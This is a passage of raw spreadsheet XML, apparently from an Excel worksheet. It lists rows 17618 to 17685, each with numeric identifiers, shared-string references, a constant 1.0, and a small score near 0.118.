      </c>
      <c r="F17618" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17619" ht="15.75" customHeight="1">
      <c r="A17619" s="1">
        <v>27297.0</v>
      </c>
      <c r="B17619" s="2">
        <v>2.1306947E7</v>
      </c>
      <c r="C17619" s="2" t="s">
        <v>16986</v>
      </c>
      <c r="D17619" s="2">
        <v>1.0</v>
      </c>
      <c r="E17619" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17619" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17620" ht="15.75" customHeight="1">
      <c r="A17620" s="1">
        <v>28926.0</v>
      </c>
      <c r="B17620" s="2">
        <v>2.9545779E7</v>
      </c>
      <c r="C17620" s="2" t="s">
        <v>16987</v>
      </c>
      <c r="D17620" s="2">
        <v>1.0</v>
      </c>
      <c r="E17620" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17620" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17621" ht="15.75" customHeight="1">
      <c r="A17621" s="1">
        <v>29194.0</v>
      </c>
      <c r="B17621" s="2">
        <v>3.07315E7</v>
      </c>
      <c r="C17621" s="2" t="s">
        <v>16988</v>
      </c>
      <c r="D17621" s="2">
        <v>1.0</v>
      </c>
      <c r="E17621" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17621" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17622" ht="15.75" customHeight="1">
      <c r="A17622" s="1">
        <v>30029.0</v>
      </c>
      <c r="B17622" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C17622" s="2" t="s">
        <v>16989</v>
      </c>
      <c r="D17622" s="2">
        <v>1.0</v>
      </c>
      <c r="E17622" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17622" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17623" ht="15.75" customHeight="1">
      <c r="A17623" s="1">
        <v>30056.0</v>
      </c>
      <c r="B17623" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C17623" s="2" t="s">
        <v>16990</v>
      </c>
      <c r="D17623" s="2">
        <v>1.0</v>
      </c>
      <c r="E17623" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17623" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17624" ht="15.75" customHeight="1">
      <c r="A17624" s="1">
        <v>31369.0</v>
      </c>
      <c r="B17624" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C17624" s="2" t="s">
        <v>16991</v>
      </c>
      <c r="D17624" s="2">
        <v>1.0</v>
      </c>
      <c r="E17624" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17624" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17625" ht="15.75" customHeight="1">
      <c r="A17625" s="1">
        <v>31371.0</v>
      </c>
      <c r="B17625" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C17625" s="2" t="s">
        <v>16992</v>
      </c>
      <c r="D17625" s="2">
        <v>1.0</v>
      </c>
      <c r="E17625" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17625" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17626" ht="15.75" customHeight="1">
      <c r="A17626" s="1">
        <v>31738.0</v>
      </c>
      <c r="B17626" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C17626" s="2" t="s">
        <v>16993</v>
      </c>
      <c r="D17626" s="2">
        <v>1.0</v>
      </c>
      <c r="E17626" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17626" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17627" ht="15.75" customHeight="1">
      <c r="A17627" s="1">
        <v>33556.0</v>
      </c>
      <c r="B17627" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C17627" s="2" t="s">
        <v>16994</v>
      </c>
      <c r="D17627" s="2">
        <v>1.0</v>
      </c>
      <c r="E17627" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17627" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17628" ht="15.75" customHeight="1">
      <c r="A17628" s="1">
        <v>34060.0</v>
      </c>
      <c r="B17628" s="2">
        <v>9610078.0</v>
      </c>
      <c r="C17628" s="2" t="s">
        <v>16995</v>
      </c>
      <c r="D17628" s="2">
        <v>1.0</v>
      </c>
      <c r="E17628" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17628" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17629" ht="15.75" customHeight="1">
      <c r="A17629" s="1">
        <v>16120.0</v>
      </c>
      <c r="B17629" s="2">
        <v>4.5464181E7</v>
      </c>
      <c r="C17629" s="2" t="s">
        <v>16996</v>
      </c>
      <c r="D17629" s="2">
        <v>1.0</v>
      </c>
      <c r="E17629" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17629" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="17630" ht="15.75" customHeight="1">
      <c r="A17630" s="1">
        <v>4129.0</v>
      </c>
      <c r="B17630" s="2">
        <v>4.1384498E7</v>
      </c>
      <c r="C17630" s="2" t="s">
        <v>16997</v>
      </c>
      <c r="D17630" s="2">
        <v>1.0</v>
      </c>
      <c r="E17630" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17630" s="2">
        <v>0.1183574879227054</v>
      </c>
    </row>
    <row r="17631" ht="15.75" customHeight="1">
      <c r="A17631" s="1">
        <v>1963.0</v>
      </c>
      <c r="B17631" s="2">
        <v>3.0331335E7</v>
      </c>
      <c r="C17631" s="2" t="s">
        <v>16998</v>
      </c>
      <c r="D17631" s="2">
        <v>1.0</v>
      </c>
      <c r="E17631" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17631" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="17632" ht="15.75" customHeight="1">
      <c r="A17632" s="1">
        <v>10418.0</v>
      </c>
      <c r="B17632" s="2">
        <v>1.0129356E7</v>
      </c>
      <c r="C17632" s="2" t="s">
        <v>16999</v>
      </c>
      <c r="D17632" s="2">
        <v>1.0</v>
      </c>
      <c r="E17632" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17632" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="17633" ht="15.75" customHeight="1">
      <c r="A17633" s="1">
        <v>11401.0</v>
      </c>
      <c r="B17633" s="2">
        <v>2.159539E7</v>
      </c>
      <c r="C17633" s="2" t="s">
        <v>17000</v>
      </c>
      <c r="D17633" s="2">
        <v>1.0</v>
      </c>
      <c r="E17633" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17633" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="17634" ht="15.75" customHeight="1">
      <c r="A17634" s="1">
        <v>11846.0</v>
      </c>
      <c r="B17634" s="2">
        <v>2.4746282E7</v>
      </c>
      <c r="C17634" s="2" t="s">
        <v>17001</v>
      </c>
      <c r="D17634" s="2">
        <v>1.0</v>
      </c>
      <c r="E17634" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17634" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="17635" ht="15.75" customHeight="1">
      <c r="A17635" s="1">
        <v>20844.0</v>
      </c>
      <c r="B17635" s="2">
        <v>1.5655631E7</v>
      </c>
      <c r="C17635" s="2" t="s">
        <v>17002</v>
      </c>
      <c r="D17635" s="2">
        <v>1.0</v>
      </c>
      <c r="E17635" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17635" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="17636" ht="15.75" customHeight="1">
      <c r="A17636" s="1">
        <v>32913.0</v>
      </c>
      <c r="B17636" s="2">
        <v>6409446.0</v>
      </c>
      <c r="C17636" s="2" t="s">
        <v>17003</v>
      </c>
      <c r="D17636" s="2">
        <v>1.0</v>
      </c>
      <c r="E17636" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17636" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="17637" ht="15.75" customHeight="1">
      <c r="A17637" s="1">
        <v>5705.0</v>
      </c>
      <c r="B17637" s="2">
        <v>4.6538665E7</v>
      </c>
      <c r="C17637" s="2" t="s">
        <v>17004</v>
      </c>
      <c r="D17637" s="2">
        <v>1.0</v>
      </c>
      <c r="E17637" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17637" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17638" ht="15.75" customHeight="1">
      <c r="A17638" s="1">
        <v>11518.0</v>
      </c>
      <c r="B17638" s="2">
        <v>2.2313844E7</v>
      </c>
      <c r="C17638" s="2" t="s">
        <v>17005</v>
      </c>
      <c r="D17638" s="2">
        <v>1.0</v>
      </c>
      <c r="E17638" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17638" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17639" ht="15.75" customHeight="1">
      <c r="A17639" s="1">
        <v>12896.0</v>
      </c>
      <c r="B17639" s="2">
        <v>3.2059114E7</v>
      </c>
      <c r="C17639" s="2" t="s">
        <v>17006</v>
      </c>
      <c r="D17639" s="2">
        <v>1.0</v>
      </c>
      <c r="E17639" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17639" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17640" ht="15.75" customHeight="1">
      <c r="A17640" s="1">
        <v>13225.0</v>
      </c>
      <c r="B17640" s="2">
        <v>3.4229909E7</v>
      </c>
      <c r="C17640" s="2" t="s">
        <v>17007</v>
      </c>
      <c r="D17640" s="2">
        <v>1.0</v>
      </c>
      <c r="E17640" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17640" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17641" ht="15.75" customHeight="1">
      <c r="A17641" s="1">
        <v>15956.0</v>
      </c>
      <c r="B17641" s="2">
        <v>4.4770538E7</v>
      </c>
      <c r="C17641" s="2" t="s">
        <v>17008</v>
      </c>
      <c r="D17641" s="2">
        <v>1.0</v>
      </c>
      <c r="E17641" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17641" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17642" ht="15.75" customHeight="1">
      <c r="A17642" s="1">
        <v>21218.0</v>
      </c>
      <c r="B17642" s="2">
        <v>1.9592771E7</v>
      </c>
      <c r="C17642" s="2" t="s">
        <v>17009</v>
      </c>
      <c r="D17642" s="2">
        <v>1.0</v>
      </c>
      <c r="E17642" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17642" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17643" ht="15.75" customHeight="1">
      <c r="A17643" s="1">
        <v>30623.0</v>
      </c>
      <c r="B17643" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C17643" s="2" t="s">
        <v>17010</v>
      </c>
      <c r="D17643" s="2">
        <v>1.0</v>
      </c>
      <c r="E17643" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17643" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17644" ht="15.75" customHeight="1">
      <c r="A17644" s="1">
        <v>32722.0</v>
      </c>
      <c r="B17644" s="2">
        <v>5984823.0</v>
      </c>
      <c r="C17644" s="2" t="s">
        <v>17011</v>
      </c>
      <c r="D17644" s="2">
        <v>1.0</v>
      </c>
      <c r="E17644" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17644" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="17645" ht="15.75" customHeight="1">
      <c r="A17645" s="1">
        <v>16098.0</v>
      </c>
      <c r="B17645" s="2">
        <v>4.5395554E7</v>
      </c>
      <c r="C17645" s="2" t="s">
        <v>17012</v>
      </c>
      <c r="D17645" s="2">
        <v>1.0</v>
      </c>
      <c r="E17645" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17645" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="17646" ht="15.75" customHeight="1">
      <c r="A17646" s="1">
        <v>15822.0</v>
      </c>
      <c r="B17646" s="2">
        <v>4.4282074E7</v>
      </c>
      <c r="C17646" s="2" t="s">
        <v>17013</v>
      </c>
      <c r="D17646" s="2">
        <v>1.0</v>
      </c>
      <c r="E17646" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17646" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="17647" ht="15.75" customHeight="1">
      <c r="A17647" s="1">
        <v>16253.0</v>
      </c>
      <c r="B17647" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C17647" s="2" t="s">
        <v>17014</v>
      </c>
      <c r="D17647" s="2">
        <v>1.0</v>
      </c>
      <c r="E17647" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17647" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="17648" ht="15.75" customHeight="1">
      <c r="A17648" s="1">
        <v>25200.0</v>
      </c>
      <c r="B17648" s="2">
        <v>1.3213953E7</v>
      </c>
      <c r="C17648" s="2" t="s">
        <v>17015</v>
      </c>
      <c r="D17648" s="2">
        <v>1.0</v>
      </c>
      <c r="E17648" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17648" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="17649" ht="15.75" customHeight="1">
      <c r="A17649" s="1">
        <v>29916.0</v>
      </c>
      <c r="B17649" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C17649" s="2" t="s">
        <v>17016</v>
      </c>
      <c r="D17649" s="2">
        <v>1.0</v>
      </c>
      <c r="E17649" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17649" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="17650" ht="15.75" customHeight="1">
      <c r="A17650" s="1">
        <v>1633.0</v>
      </c>
      <c r="B17650" s="2">
        <v>2.7998059E7</v>
      </c>
      <c r="C17650" s="2" t="s">
        <v>17017</v>
      </c>
      <c r="D17650" s="2">
        <v>1.0</v>
      </c>
      <c r="E17650" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17650" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="17651" ht="15.75" customHeight="1">
      <c r="A17651" s="1">
        <v>23729.0</v>
      </c>
      <c r="B17651" s="2">
        <v>7260878.0</v>
      </c>
      <c r="C17651" s="2" t="s">
        <v>17018</v>
      </c>
      <c r="D17651" s="2">
        <v>1.0</v>
      </c>
      <c r="E17651" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17651" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="17652" ht="15.75" customHeight="1">
      <c r="A17652" s="1">
        <v>24394.0</v>
      </c>
      <c r="B17652" s="2">
        <v>1.078321E7</v>
      </c>
      <c r="C17652" s="2" t="s">
        <v>17019</v>
      </c>
      <c r="D17652" s="2">
        <v>1.0</v>
      </c>
      <c r="E17652" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17652" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="17653" ht="15.75" customHeight="1">
      <c r="A17653" s="1">
        <v>25356.0</v>
      </c>
      <c r="B17653" s="2">
        <v>1.3557451E7</v>
      </c>
      <c r="C17653" s="2" t="s">
        <v>17020</v>
      </c>
      <c r="D17653" s="2">
        <v>1.0</v>
      </c>
      <c r="E17653" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17653" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="17654" ht="15.75" customHeight="1">
      <c r="A17654" s="1">
        <v>27371.0</v>
      </c>
      <c r="B17654" s="2">
        <v>2.1684386E7</v>
      </c>
      <c r="C17654" s="2" t="s">
        <v>17021</v>
      </c>
      <c r="D17654" s="2">
        <v>1.0</v>
      </c>
      <c r="E17654" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17654" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="17655" ht="15.75" customHeight="1">
      <c r="A17655" s="1">
        <v>27620.0</v>
      </c>
      <c r="B17655" s="2">
        <v>2.2686181E7</v>
      </c>
      <c r="C17655" s="2" t="s">
        <v>17022</v>
      </c>
      <c r="D17655" s="2">
        <v>1.0</v>
      </c>
      <c r="E17655" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17655" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="17656" ht="15.75" customHeight="1">
      <c r="A17656" s="1">
        <v>32416.0</v>
      </c>
      <c r="B17656" s="2">
        <v>5641239.0</v>
      </c>
      <c r="C17656" s="2" t="s">
        <v>17023</v>
      </c>
      <c r="D17656" s="2">
        <v>1.0</v>
      </c>
      <c r="E17656" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17656" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="17657" ht="15.75" customHeight="1">
      <c r="A17657" s="1">
        <v>1234.0</v>
      </c>
      <c r="B17657" s="2">
        <v>2.5028465E7</v>
      </c>
      <c r="C17657" s="2" t="s">
        <v>17024</v>
      </c>
      <c r="D17657" s="2">
        <v>1.0</v>
      </c>
      <c r="E17657" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17657" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="17658" ht="15.75" customHeight="1">
      <c r="A17658" s="1">
        <v>26481.0</v>
      </c>
      <c r="B17658" s="2">
        <v>1.7446753E7</v>
      </c>
      <c r="C17658" s="2" t="s">
        <v>17025</v>
      </c>
      <c r="D17658" s="2">
        <v>1.0</v>
      </c>
      <c r="E17658" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17658" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="17659" ht="15.75" customHeight="1">
      <c r="A17659" s="1">
        <v>26521.0</v>
      </c>
      <c r="B17659" s="2">
        <v>1.7644698E7</v>
      </c>
      <c r="C17659" s="2" t="s">
        <v>17026</v>
      </c>
      <c r="D17659" s="2">
        <v>1.0</v>
      </c>
      <c r="E17659" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17659" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="17660" ht="15.75" customHeight="1">
      <c r="A17660" s="1">
        <v>1038.0</v>
      </c>
      <c r="B17660" s="2">
        <v>2.3251224E7</v>
      </c>
      <c r="C17660" s="2" t="s">
        <v>17027</v>
      </c>
      <c r="D17660" s="2">
        <v>1.0</v>
      </c>
      <c r="E17660" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17660" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="17661" ht="15.75" customHeight="1">
      <c r="A17661" s="1">
        <v>18146.0</v>
      </c>
      <c r="B17661" s="2">
        <v>5.1852338E7</v>
      </c>
      <c r="C17661" s="2" t="s">
        <v>17028</v>
      </c>
      <c r="D17661" s="2">
        <v>1.0</v>
      </c>
      <c r="E17661" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17661" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="17662" ht="15.75" customHeight="1">
      <c r="A17662" s="1">
        <v>26689.0</v>
      </c>
      <c r="B17662" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C17662" s="2" t="s">
        <v>17029</v>
      </c>
      <c r="D17662" s="2">
        <v>1.0</v>
      </c>
      <c r="E17662" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17662" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="17663" ht="15.75" customHeight="1">
      <c r="A17663" s="1">
        <v>30712.0</v>
      </c>
      <c r="B17663" s="2">
        <v>4.3062376E7</v>
      </c>
      <c r="C17663" s="2" t="s">
        <v>17030</v>
      </c>
      <c r="D17663" s="2">
        <v>1.0</v>
      </c>
      <c r="E17663" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17663" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="17664" ht="15.75" customHeight="1">
      <c r="A17664" s="1">
        <v>15218.0</v>
      </c>
      <c r="B17664" s="2">
        <v>4.216087E7</v>
      </c>
      <c r="C17664" s="2" t="s">
        <v>17031</v>
      </c>
      <c r="D17664" s="2">
        <v>1.0</v>
      </c>
      <c r="E17664" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17664" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="17665" ht="15.75" customHeight="1">
      <c r="A17665" s="1">
        <v>17378.0</v>
      </c>
      <c r="B17665" s="2">
        <v>4.952809E7</v>
      </c>
      <c r="C17665" s="2" t="s">
        <v>17032</v>
      </c>
      <c r="D17665" s="2">
        <v>1.0</v>
      </c>
      <c r="E17665" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17665" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="17666" ht="15.75" customHeight="1">
      <c r="A17666" s="1">
        <v>19823.0</v>
      </c>
      <c r="B17666" s="2">
        <v>5.7001018E7</v>
      </c>
      <c r="C17666" s="2" t="s">
        <v>17033</v>
      </c>
      <c r="D17666" s="2">
        <v>1.0</v>
      </c>
      <c r="E17666" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17666" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="17667" ht="15.75" customHeight="1">
      <c r="A17667" s="1">
        <v>22455.0</v>
      </c>
      <c r="B17667" s="2">
        <v>3627632.0</v>
      </c>
      <c r="C17667" s="2" t="s">
        <v>17034</v>
      </c>
      <c r="D17667" s="2">
        <v>1.0</v>
      </c>
      <c r="E17667" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17667" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="17668" ht="15.75" customHeight="1">
      <c r="A17668" s="1">
        <v>26614.0</v>
      </c>
      <c r="B17668" s="2">
        <v>1.8020491E7</v>
      </c>
      <c r="C17668" s="2" t="s">
        <v>17035</v>
      </c>
      <c r="D17668" s="2">
        <v>1.0</v>
      </c>
      <c r="E17668" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17668" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="17669" ht="15.75" customHeight="1">
      <c r="A17669" s="1">
        <v>27642.0</v>
      </c>
      <c r="B17669" s="2">
        <v>2.2751795E7</v>
      </c>
      <c r="C17669" s="2" t="s">
        <v>17036</v>
      </c>
      <c r="D17669" s="2">
        <v>1.0</v>
      </c>
      <c r="E17669" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17669" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="17670" ht="15.75" customHeight="1">
      <c r="A17670" s="1">
        <v>30917.0</v>
      </c>
      <c r="B17670" s="2">
        <v>4.6807928E7</v>
      </c>
      <c r="C17670" s="2" t="s">
        <v>17037</v>
      </c>
      <c r="D17670" s="2">
        <v>1.0</v>
      </c>
      <c r="E17670" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17670" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="17671" ht="15.75" customHeight="1">
      <c r="A17671" s="1">
        <v>1459.0</v>
      </c>
      <c r="B17671" s="2">
        <v>2.690009E7</v>
      </c>
      <c r="C17671" s="2" t="s">
        <v>17038</v>
      </c>
      <c r="D17671" s="2">
        <v>1.0</v>
      </c>
      <c r="E17671" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17671" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17672" ht="15.75" customHeight="1">
      <c r="A17672" s="1">
        <v>4341.0</v>
      </c>
      <c r="B17672" s="2">
        <v>4.2069847E7</v>
      </c>
      <c r="C17672" s="2" t="s">
        <v>17039</v>
      </c>
      <c r="D17672" s="2">
        <v>1.0</v>
      </c>
      <c r="E17672" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17672" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17673" ht="15.75" customHeight="1">
      <c r="A17673" s="1">
        <v>9716.0</v>
      </c>
      <c r="B17673" s="2">
        <v>5.6400536E7</v>
      </c>
      <c r="C17673" s="2" t="s">
        <v>17040</v>
      </c>
      <c r="D17673" s="2">
        <v>1.0</v>
      </c>
      <c r="E17673" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17673" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17674" ht="15.75" customHeight="1">
      <c r="A17674" s="1">
        <v>12425.0</v>
      </c>
      <c r="B17674" s="2">
        <v>2.918425E7</v>
      </c>
      <c r="C17674" s="2" t="s">
        <v>17041</v>
      </c>
      <c r="D17674" s="2">
        <v>1.0</v>
      </c>
      <c r="E17674" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17674" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17675" ht="15.75" customHeight="1">
      <c r="A17675" s="1">
        <v>12931.0</v>
      </c>
      <c r="B17675" s="2">
        <v>3.2333641E7</v>
      </c>
      <c r="C17675" s="2" t="s">
        <v>17042</v>
      </c>
      <c r="D17675" s="2">
        <v>1.0</v>
      </c>
      <c r="E17675" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17675" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17676" ht="15.75" customHeight="1">
      <c r="A17676" s="1">
        <v>18168.0</v>
      </c>
      <c r="B17676" s="2">
        <v>5.1928315E7</v>
      </c>
      <c r="C17676" s="2" t="s">
        <v>17043</v>
      </c>
      <c r="D17676" s="2">
        <v>1.0</v>
      </c>
      <c r="E17676" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17676" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17677" ht="15.75" customHeight="1">
      <c r="A17677" s="1">
        <v>20389.0</v>
      </c>
      <c r="B17677" s="2">
        <v>1.2034866E7</v>
      </c>
      <c r="C17677" s="2" t="s">
        <v>17044</v>
      </c>
      <c r="D17677" s="2">
        <v>1.0</v>
      </c>
      <c r="E17677" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17677" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17678" ht="15.75" customHeight="1">
      <c r="A17678" s="1">
        <v>21482.0</v>
      </c>
      <c r="B17678" s="2">
        <v>2.2982736E7</v>
      </c>
      <c r="C17678" s="2" t="s">
        <v>17045</v>
      </c>
      <c r="D17678" s="2">
        <v>1.0</v>
      </c>
      <c r="E17678" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17678" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17679" ht="15.75" customHeight="1">
      <c r="A17679" s="1">
        <v>22136.0</v>
      </c>
      <c r="B17679" s="2">
        <v>3.1103165E7</v>
      </c>
      <c r="C17679" s="2" t="s">
        <v>17046</v>
      </c>
      <c r="D17679" s="2">
        <v>1.0</v>
      </c>
      <c r="E17679" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17679" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17680" ht="15.75" customHeight="1">
      <c r="A17680" s="1">
        <v>24027.0</v>
      </c>
      <c r="B17680" s="2">
        <v>9404116.0</v>
      </c>
      <c r="C17680" s="2" t="s">
        <v>17047</v>
      </c>
      <c r="D17680" s="2">
        <v>1.0</v>
      </c>
      <c r="E17680" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17680" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17681" ht="15.75" customHeight="1">
      <c r="A17681" s="1">
        <v>26549.0</v>
      </c>
      <c r="B17681" s="2">
        <v>1.7766604E7</v>
      </c>
      <c r="C17681" s="2" t="s">
        <v>17048</v>
      </c>
      <c r="D17681" s="2">
        <v>1.0</v>
      </c>
      <c r="E17681" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17681" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17682" ht="15.75" customHeight="1">
      <c r="A17682" s="1">
        <v>28090.0</v>
      </c>
      <c r="B17682" s="2">
        <v>2.4654164E7</v>
      </c>
      <c r="C17682" s="2" t="s">
        <v>17049</v>
      </c>
      <c r="D17682" s="2">
        <v>1.0</v>
      </c>
      <c r="E17682" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17682" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17683" ht="15.75" customHeight="1">
      <c r="A17683" s="1">
        <v>33986.0</v>
      </c>
      <c r="B17683" s="2">
        <v>9404115.0</v>
      </c>
      <c r="C17683" s="2" t="s">
        <v>17047</v>
      </c>
      <c r="D17683" s="2">
        <v>1.0</v>
      </c>
      <c r="E17683" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17683" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17684" ht="15.75" customHeight="1">
      <c r="A17684" s="1">
        <v>34210.0</v>
      </c>
      <c r="B17684" s="2">
        <v>2.947992E7</v>
      </c>
      <c r="C17684" s="2" t="s">
        <v>17050</v>
      </c>
      <c r="D17684" s="2">
        <v>1.0</v>
      </c>
      <c r="E17684" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17684" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="17685" ht="15.75" customHeight="1">
      <c r="A17685" s="1">
        <v>10030.0</v>
      </c>
      <c r="B17685" s="2">
        <v>5.7055232E7</v>
      </c>
      <c r="C17685" s="2" t="s">
        <v>17051</v>
      </c>
      <c r="D17685" s="2">
        <v>1.0</v>
      </c>
      <c r="E17685" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17685" s="2">
